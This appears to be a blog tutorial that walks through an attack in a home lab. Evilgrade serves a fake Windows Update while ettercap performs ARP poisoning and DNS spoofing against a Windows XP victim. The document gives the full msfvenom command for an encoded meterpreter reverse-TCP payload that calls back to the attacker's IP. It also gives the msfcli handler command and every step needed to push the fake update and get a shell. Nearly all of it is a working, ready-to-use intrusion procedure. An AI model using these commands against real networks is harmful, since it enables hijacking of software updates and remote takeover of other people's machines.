After install evilgrade on Backtrack5(Tutorial how to install evilgrade on Backtrack5). Now we try to use it. And this tutorial, we will use the new Metasploit tool name's "msfvenom" to create the shell and use it to pwn victim. You can download this tutorial document and my ettercap-ng that was compiled by myself in the last of this post.
Attacker IP: 192.168.168.156 [Backtrack 5 Gnome Desktop 64Bit]
Victim IP: 192.168.168.159 [Windows XP SP2]
1. Go to path of evilgrade and run it.
$ cd /pentest/exploits/isr-evilgrade
2. After load all modules, you can list all modules with command.
evilgrade> show modules
3. Pick the modules that you want to spoof, in this tutorial I pick the "winupdate". to pwing victim machine who want to update his windows
evilgrade> configure winupdate
4. Show options of this module.
evilgrade(winupdate)> show options
5. Set the agent for run when victim request windows update. This step, we use msfvenom to create and encode the payload.
evilgrade(winupdate)> set agent '["/pentest/exploits/framework3/msfvenom -p windows/meterpreter/reverse_tcp -e -i 3 LHOST=192.168.168.156 LPORT=445 -f exe 1> <%OUT%>/tmp/windowsupdate.exe<%OUT%>"]'
6. Make sure that you don't have DNS service(port 53) on the host and the same port of LPORT in step#5 don't use.
7. Start the evilgrade server.
8. Edit and set spoofing DNS resolving of "windowsupdate.microsoft.com","update.microsoft.com","www.microsoft.com","go.microsoft.com" in /usr/share/ettercap/etter.dns with any tool editors, like this picture.
9. Run ettercap with -G option for GUI.
$ ettercap -G
10. Go to Sniff -> Unified Sniffing
11.Choose the interface you want to sniff.
12. Enable DNS Spoofing plugin with go to Plugins -> Manage the Plugins -> Double Click "dns_spoof"
13. Scan machine in the same network with go to Hosts -> Scan for hosts
14. View the hosts in network and set the victim with go to Hosts -> Hosts list -> Click Gateway IP and [Add to Target 1] -> Click Victim IP and [Add to Target 2]
15. Start to attack with go to Mitm -> Arp poisoning -> Click Sniff remote connections
16. Start Sniffing with go to Start -> Start Sniffing
17. Use Metasploit command's msfcli to create listening service from victim machine.
$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=445 LHOST=192.168.168.156
18. In the victim machine, Try to update windows. it will redirect from windowsupdate.microsoft.com to Attacker machine. And popup for victim to download update file.
19. When victim run the update file, we will get the meterpreter.